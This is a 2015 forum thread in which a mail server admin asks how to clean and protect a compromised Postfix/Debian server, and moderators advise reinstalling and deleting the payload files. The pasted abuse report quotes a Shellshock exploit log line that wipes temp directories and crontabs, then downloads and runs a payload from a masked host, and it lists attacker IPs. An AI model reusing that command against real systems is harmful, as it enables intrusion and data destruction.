Pages: [1]

Author Topic: mail server attack  (Read 1223 times)

0 Members and 1 Guest are viewing this topic.

Offline dendic

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
mail server attack
« on: May 03, 2015, 08:31:16 am »
I received next message.Please little explain of my problem  and what can I do with my mail server (postfix,debian) to protect all? ( I have spamassasin on mail server)



From: chopper boy <choprboy@hotmail.com>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "abuse@xxx.com




Compromised server / Exploit attempts




Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.


Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP -mog servera)


Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif


Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>






5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'"

« Last Edit: May 03, 2015, 08:36:20 am by dendic »
Report to moderator   Logged

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: mail server attack
« Reply #1 on: May 03, 2015, 09:47:52 am »
Please give more information about the situation , thus far it is not clear.
From the looks of it from what I can tell your server has been compromised and it is attacking other boxes.
Best bet is to setup another box since it is very hard to tell if you have rootkits.
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline dendic

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: mail server attack
« Reply #2 on: May 03, 2015, 02:59:42 pm »

what kind of protection to install and how to clean up the my mail server
From: Christopher Ravnborg <cr@rackhosting.com> Date: 2015-04-29 10:34 GMT+02:00 Subject: xxx.xxx.xxx.xxx hosting malicious content To: ivanxx@mydomain.net Cc: "abuse@rackhosting.com" <abuse@rackhosting.com> Hello, xxx.xxx.xxx.xxx is hosting malicious content in form os bruteforce and/or DDoS tools. http://xxx.xxx.xxx.xxx/i.gif shellcode http://xxx.xxx.xxx.xxx/nynew54.gif tar archive. Please handle this issue. -- Med venlig hilsen / Best regards Christopher Ravnborg Rackhosting.com ApS
Report to moderator   Logged

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: mail server attack
« Reply #3 on: May 03, 2015, 03:08:55 pm »
As I said I suggested you just do a fresh install and keep auto updates on.
Migrating the mail DB shouldnt be that hard.
« Last Edit: May 03, 2015, 03:09:06 pm by proxx »
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: mail server attack
« Reply #4 on: May 03, 2015, 08:57:05 pm »
Also remove those gifts considering they're the malicious payload...
Report to moderator   Logged
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry
Pages: [1]